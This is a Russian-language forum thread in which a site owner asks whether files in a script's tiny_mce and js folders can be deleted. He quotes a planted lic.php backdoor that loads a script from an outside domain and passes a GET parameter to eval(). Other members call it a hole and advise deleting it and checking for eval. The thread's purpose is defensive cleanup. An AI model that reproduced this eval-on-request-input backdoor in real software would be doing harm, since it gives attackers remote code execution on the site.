nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
В ней папка : tiny_mce и часто встречается вот такой код в разных файлах этой папки :
/**
* form_utils.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under LGPL License.
*
* License: http://tinymce.moxiecode.com/license
* Contributing: http://tinymce.moxiecode.com/contributing
*/
Его можно удалять ? Он всегда в самом начале , не является дырой случайно ?
/**
* form_utils.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under LGPL License.
*
* License: http://tinymce.moxiecode.com/license
* Contributing: http://tinymce.moxiecode.com/contributing
*/
Его можно удалять ? Он всегда в самом начале , не является дырой случайно ?
можешь удалитьnikitin2016 написал(а):В ней папка : tiny_mce и часто встречается вот такой код в разных файлах этой папки :
/**
* form_utils.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under LGPL License.
*
* License: http://tinymce.moxiecode.com/license
* Contributing: http://tinymce.moxiecode.com/contributing
*/
Его можно удалять ? Он всегда в самом начале , не является дырой случайно ?
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
а файл : lic.php нужен ?kvozimir написал(а):можешь удалить
в нем этот код :
<script type=\"text/javascript\" src=\"http://wwes.ga/agreement.html\"></script>
<?
// Получаем лицензию
$license = $_GET['license'];
//Соглашаемся с правилами предоставления скрипта
eval($license);
?>
удаляйnikitin2016 написал(а):а файл : lic.php нужен ?
в нем этот код :
<script type=\"text/javascript\" src=\"http://wwes.ga/agreement.html\"></script>
<?
// Получаем лицензию
$license = $_GET['license'];
//Соглашаемся с правилами предоставления скрипта
eval($license);
?>
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
а скрипт не поломается от этого ? Функционал будет также норм работать без этих кодов ?kvozimir написал(а):удаляй
они что были спец. туда всунуты это дыры ?
все норм будет,ну что то вроде дырnikitin2016 написал(а):а скрипт не поломается от этого ? Функционал будет также норм работать без этих кодов ?
они что были спец. туда всунуты это дыры ?
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
я на этот сайт перехожу : http://wwes.ga/agreement.html а у меня пустая страница и пишет сайт не найден ! Что это за сайт такой ?kvozimir написал(а):все норм будет,ну что то вроде дыр
не
не знаю))nikitin2016 написал(а):я на этот сайт перехожу : http://wwes.ga/agreement.html а у меня пустая страница и пишет сайт не найден ! Что это за сайт такой ?
The Doshs
Участник
- Сообщения
- 383
- Реакции
- 63
- Сообщения
- 280
- Реакции
- 46
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
вы предлагаете папку: tiny_mce , которая в папке: js удалить совсем ? И скрипт от этого не развалиться ? в нее же вложено куча других папок !skroliks написал(а):В разделе форума "Дыры на сайте" было уже написано неоднократно по поводу папки tiny_mce - это дыра, которая используется злоумышленниками для взлома сайта. Так что смело можно удалять! (Пока вроде никто не жаловался на неработоспособность скрипта после удаления этой папки)
- Сообщения
- 322
- Реакции
- 72
tiny_mce - это текстовый редактор.Если вдруг решишь удалять этот редактор, то не забудь удалить его использование на тех страницах, где он применялсяnikitin2016 написал(а):вы предлагаете папку: tiny_mce , которая в папке: js удалить совсем ? И скрипт от этого не развалиться ? в нее же вложено куча других папок !
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
Да вот не хотелось бы текстовый редактор удалять, так то через админку что то красиво написать то нужно всегда ! Как кроме .htaccess (а) его можно защитить чтоб дыры не было ?MegaGoblin написал(а):tiny_mce - это текстовый редактор.Если вдруг решишь удалять этот редактор, то не забудь удалить его использование на тех страницах, где он применялся
- Сообщения
- 322
- Реакции
- 72
А чем тебе htaccess не нравится?nikitin2016 написал(а):Да вот не хотелось бы текстовый редактор удалять, так то через админку что то красиво написать то нужно всегда ! Как кроме .htaccess (а) его можно защитить чтоб дыры не было ?
Можно найти онлайн редактор, написать новость в нем, скопировать код и вставлять в админке.
А еще удалять необязательно его. Надо лишь проверить все файлы на наличие вредосносного кода, вроде 'eval'-а, о котором писали выше.
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
так файлов то гора в этой папке js попробуй все проверь ! Вдруг останется какой нибудь вредоносный код ! А кроме eval (a) какие еще вредоносные коды есть в наших фермах ?MegaGoblin написал(а):А чем тебе htaccess не нравится?
Можно найти онлайн редактор, написать новость в нем, скопировать код и вставлять в админке.
А еще удалять необязательно его. Надо лишь проверить все файлы на наличие вредосносного кода, вроде 'eval'-а, о котором писали выше.
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
- Сообщения
- 280
- Реакции
- 46
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
Именно так и есть я полностью удалил папку тайни мке и норм скрпт работает и еще кучу лишних файлов в папке js и все нормульskroliks написал(а):Подскажите, я правильно понимаю, что файлы из папки js используются только там, где в кодах файлов php указано, что используется JavaScript? Просто я уверен, что там много лишних файлов и большинство можно удалить за ненадобностью..